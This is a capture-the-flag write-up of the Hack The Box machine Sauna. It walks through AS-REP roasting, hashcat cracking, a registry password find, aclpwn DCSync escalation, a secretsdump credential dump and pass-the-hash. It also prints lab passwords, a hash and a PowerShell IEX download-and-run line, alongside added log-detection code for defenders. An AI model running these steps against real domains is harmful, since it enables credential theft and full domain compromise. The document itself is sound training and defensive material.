Hack The Box Writeup: Sauna

After the JSON box was retired, a new Microsoft Windows box was released. Under the name Sauna, this “Easy” box went live on February 15th for everyone to go wild on with a good dose of DCSync power!

Hack The Box Sauna Infocard

[0x1] Reconnaissance & Enumeration

First step: the Nmap scan. The default Windows Server ports are visible, and port 80 probably serves a website based on IIS 10.0.

nmap -sV -sC -oA sauna

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 07:41 GMT

Nmap scan report for
Host is up (0.068s latency).
Not shown: 988 filtered ports
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-16 15:43:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h00m56s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-02-16T15:45:43
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 350.43 seconds

The website of the Egotistical Bank is served on port 80. The maker of this box is Egotistic, so well… that suddenly explains a lot.

There is little of interest to find while searching for usernames. Enum4linux gives no output and other tools remain silent as well. I always like to grab the “Team” page of a website: here you will often find hints to users. In this case, there are indeed a few to be found.

[0x2] Initial Foothold

A bit of brute force then. I’ve listed candidate users in users.txt based on common naming conventions: the first name, the first name plus the first letter of the last name, and the first letter of the first name plus the last name. Let’s see if this pays off.

cat users.txt 

Using GetNPUsers.py I search the list for accounts for which a Ticket Granting Ticket (TGT) can be requested without pre-authentication. These are accounts with the option “Do not require Kerberos preauthentication” enabled. I already choose to write any hashes in hashcat format so that they will be easy to crack later.

python /usr/share/impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.local/ -usersfile ~/Documents/boxes/sauna/users.txt -format hashcat -outputfile ~/Documents/boxes/sauna/kerb-hashes.txt
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

The script finishes fairly quickly and indeed finds one account for which the TGT can be obtained. The other accounts don’t seem to exist.

cat ~/Documents/boxes/sauna/kerb-hashes.txt
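From the defender's side, the GetNPUsers.py run above leaves a distinct trail in the domain controller's Security log, which this added example (not code from the original post) checks: event 4768 records Pre-Authentication Type 0 and RC4 (0x17) for the account that yields an AS-REP hash, and result code 0x6 for every guessed username that does not exist. The sample events are constructed; field names follow the 4768 event's XML data names and the 192.0.2.x addresses are placeholders.

```python
from collections import Counter

# Constructed sample 4768 (TGT requested) events. Keys are the event's XML data
# names; 192.0.2.x addresses are placeholders, not the box's real addresses.
SAMPLE_4768 = [
    # TGT issued without pre-authentication, RC4 key: source of a $krb5asrep$23$ hash
    {"TargetUserName": "fsmith", "IpAddress": "192.0.2.77", "Status": "0x0",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    # Three guessed names from the wordlist that do not exist (0x6 = unknown principal)
    {"TargetUserName": "guess1", "IpAddress": "192.0.2.77", "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "guess2", "IpAddress": "192.0.2.77", "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "guess3", "IpAddress": "192.0.2.77", "Status": "0x6",
     "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"},
    # Normal logon: pre-authentication performed (type 2), AES256 session key (0x12)
    {"TargetUserName": "svc_loanmgr", "IpAddress": "192.0.2.10", "Status": "0x0",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},
]


def asrep_roastable(events):
    """Accounts handed a TGT with no pre-authentication and an RC4 session key:
    exactly the accounts whose AS-REP can be cracked offline as on this box."""
    return sorted({e["TargetUserName"] for e in events
                   if e["Status"] == "0x0" and e["PreAuthType"] == "0"
                   and e["TicketEncryptionType"] == "0x17"})


def enumeration_sources(events, threshold=3):
    """Client addresses with at least `threshold` unknown-principal (0x6) results:
    the footprint of a username list being tried against the KDC."""
    unknown = Counter(e["IpAddress"] for e in events if e["Status"] == "0x6")
    return {ip: n for ip, n in unknown.items() if n >= threshold}


if __name__ == "__main__":
    print("AS-REP roastable:", asrep_roastable(SAMPLE_4768))
    print("enumeration sources:", enumeration_sources(SAMPLE_4768))
```

The fix for the first finding is clearing “Do not require Kerberos preauthentication” on the account; where an application really needs it, the account should at least carry a long random password that no wordlist will recover.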

The hash goes straight to Hashcat and, with the rockyou wordlist, the password is recovered within 40 seconds.

hashcat -m 18200 ~/Documents/boxes/sauna/kerb-hashes.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
* Device #1: pthread-Intel(R) Core(TM) i7-8565U CPU @ 1.80GHz, 1024/2955 MB allocatable, 4MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
* Device #1: Kernel m18200_a0-pure.b9f808b5.kernel not found in cache! Building may take a while...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs


Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:093bde1...44312c
Time.Started.....: Sun Feb 16 09:17:01 2020 (21 secs)
Time.Estimated...: Sun Feb 16 09:17:22 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 510.1 kH/s (6.79ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10543104/14344385 (73.50%)
Rejected.........: 0/10543104 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> Teague51

Started: Sun Feb 16 09:16:45 2020
Stopped: Sun Feb 16 09:17:23 2020

I can continue searching on Sauna knowing that the account fsmith with password Thestrokes23 is usable. There are some shares available, but the account has no rights to them. Not very interesting, so I switch to logging in via Windows Remote Management using the tool Evil-WinRM.

evil-winrm -u fsmith -p "Thestrokes23" -i

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents>

[0x3] Path to User flag

The connection was successful. First I check whether this account holds the user flag in its Desktop folder. It looks like it does.

*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir

    Directory: C:\Users\FSmith\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:03 AM 34 user.txt     

There it is, the user flag of Sauna. That puts the first part of this box in the pocket. There isn’t really much to do after the initial foothold, since the foothold account already is the user path.

*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt

[0x4] Path to Root flag

One of the first checks is always the C:\Users folder on a Windows Server. Here you will quickly find hints to other users on the machine. In this case, svc_loanmgr stands out.

*Evil-WinRM* PS C:\Users> dir

    Directory: C:\Users

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/25/2020 1:05 PM Administrator
d----- 1/23/2020 9:52 AM FSmith
d-r--- 1/22/2020 9:32 PM Public
d----- 1/24/2020 4:05 PM svc_loanmgr 

After a lot of enumeration, I eventually arrive at the registry via a tip. The password should be stored here, so I use a search query to search the registry for a string containing the word “password”. This takes a while, but eventually I get hold of the password for the service account. The account is configured to log in automatically and therefore the password can be found in plain text in the Winlogon key.

reg query HKLM /f password /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword REG_SZ Moneymakestheworldgoround!

With the new account I do the same thing as with fsmith: log in with Evil-WinRM to see what’s possible with this account.

evil-winrm -u "svc_loanmgr" -p "Moneymakestheworldgoround!" -i

Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>

After looking around for a while I don’t find anything interesting. After the Forest box I got some experience with BloodHound and I choose it here to see if I can find a path to any DCSync permissions. I serve SharpHound from my machine so that I can download and run it on the target. I then download the output for further analysis in BloodHound.

powershell -command "IEX(New-Object Net.WebClient).DownloadString(''); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer 'svc_loanmgr' -LdapPass 'Moneymakestheworldgoround!'"
Initializing BloodHound at 2:38 PM on 2/16/2020
Adding Network Credential to connection
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Building GUID Cache
Starting Enumeration for EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Waiting for enumeration threads to finish
Status: 60 objects enumerated (+60 60/s --- Using 76 MB RAM )
Finished enumeration for EGOTISTICAL-BANK.LOCAL in 00:00:01.9931054
0 hosts failed ping. 0 hosts timedout.
Waiting for writer thread to finish
Compressing data to C:\Users\svc_loanmgr\20200216143837_BloodHound.zip.
You can upload this file directly to the UI.
Finished compressing files!

Before I can start BloodHound, the Neo4j platform has to be running. This is only one command. If you run into pid-lock error messages, update your version of neo4j with apt-get install neo4j.

neo4j console

When neo4j has started, it is BloodHound’s turn.

I import the output from the machine under the svc_loanmgr account to see the shortest path to Domain Admin. However, this does not yield more than needing the Administrator account. With a query to look for DCSync permissions I get more output.

Yet it is not yet clear what is needed. Via a blog post by Dirk-jan Mollema I ended up with one of his tools, an extension of BloodHound called ACLPWN. Based on the BloodHound data you determine the start and the end goal, and then you use ACLPWN to do a “dry” test run first and then actually perform the actions to obtain DCSync rights. You can install ACLPWN from GitHub via pip.

pip install aclpwn 

First, I do a quick check with the -dry parameter. The path is correct and there is indeed a possibility to obtain DCSync.

aclpwn -f svc_loanmgr -ft user -d egotistical-bank.local -dry

[+] Path found!
[+] Path validated, the following modifications are required for exploitation in the current configuration:
[-] DCSync -> continue

And then for real. Without the -dry parameter, ACLPWN immediately submits the changes and gives svc_loanmgr the desired permissions.

aclpwn -f svc_loanmgr -ft user -d egotistical-bank.local
Please supply the password or LM:NTLM hashes of the account you are escalating from: 
[+] Path found!
[-] DCSync -> continue
[+] Finished running tasks

Now it is only a matter of requesting a sync from the domain controller, in this case Sauna, and writing the hashes to adhashes.txt.

python /usr/share/impacket/examples/secretsdump.py egotistical-bank/svc_loanmgr@ -just-dc -outputfile adhashes.txt

All local and domain accounts are neatly written for further processing.

Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...
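Both escalation steps above are visible in the domain controller's Security log, which this added example (not code from the original post or from ACLPWN/Impacket) checks: granting DCSync rights edits the domain object's ACL, audited as event 5136 on the nTSecurityDescriptor attribute, and secretsdump -just-dc then exercises those rights, audited as event 4662 whose Properties list the replication control-access GUIDs. The sample events are constructed; field names follow the events' XML data names, and SAUNA$ is assumed to be the DC's computer account.

```python
import re

# Control-access right GUIDs that together make up "DCSync".
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcf2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcf2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # schema GUID of domainDNS
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}")

# Constructed sample events; keys follow the XML data names of 4662 and 5136.
SAMPLE_4662 = [
    {"SubjectUserName": "SAUNA$",  # the DC's own account replicating: expected
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcf2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"SubjectUserName": "svc_loanmgr",  # a service account pulling NTDS secrets
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcf2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcf2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"SubjectUserName": "fsmith",  # ordinary access to a user object: no alert
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}", "Properties": "%%7688"},
]
SAMPLE_5136 = [
    {"SubjectUserName": "svc_loanmgr", "ObjectClass": "domainDNS",
     "ObjectDN": "DC=EGOTISTICAL-BANK,DC=LOCAL", "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"SubjectUserName": "Administrator", "ObjectClass": "user",
     "ObjectDN": "CN=FSmith,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL", "AttributeLDAPDisplayName": "description"},
]


def dcsync_alerts(events, allowed=frozenset({"SAUNA$"})):
    """(account, rights) for every 4662 in which a principal outside `allowed`
    (DC computer accounts plus any sync service that legitimately replicates)
    exercised replication rights on a domainDNS object."""
    hits = []
    for e in events:
        if DOMAIN_DNS_CLASS not in e["ObjectType"].lower():
            continue
        rights = [REPL_GUIDS[g] for g in GUID_RE.findall(e["Properties"].lower())
                  if g in REPL_GUIDS]
        if rights and e["SubjectUserName"].upper() not in allowed:
            hits.append((e["SubjectUserName"], rights))
    return hits


def domain_acl_edits(events):
    """Principals that rewrote the domain head's security descriptor (5136):
    the write that hands DCSync rights to an account that lacked them."""
    return [(e["SubjectUserName"], e["ObjectDN"]) for e in events
            if e["ObjectClass"] == "domainDNS"
            and e["AttributeLDAPDisplayName"] == "nTSecurityDescriptor"]
```

Event 5136 only appears when “Audit Directory Service Changes” is enabled and a SACL covers the domain head, so check that auditing is actually switched on before relying on the second function.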

Why make it difficult when it can also be easy? No John the Ripper or Hashcat; I just use the hash to log in with Evil-WinRM. The root.txt is already waiting for me on the desktop.

evil-winrm -u administrator -H d9485863c1e9e05851aa40cbb4ab9dff -i

Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir
    Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-a---- 1/23/2020 10:22 AM 32 root.txt 

Do you even got root, bro? Well, now I have 🙂 An interesting box where the methods weren’t that complicated, but a lot of time goes into the enumeration.

*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt

All information in this post is for educational use only! Do not use it against others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail!
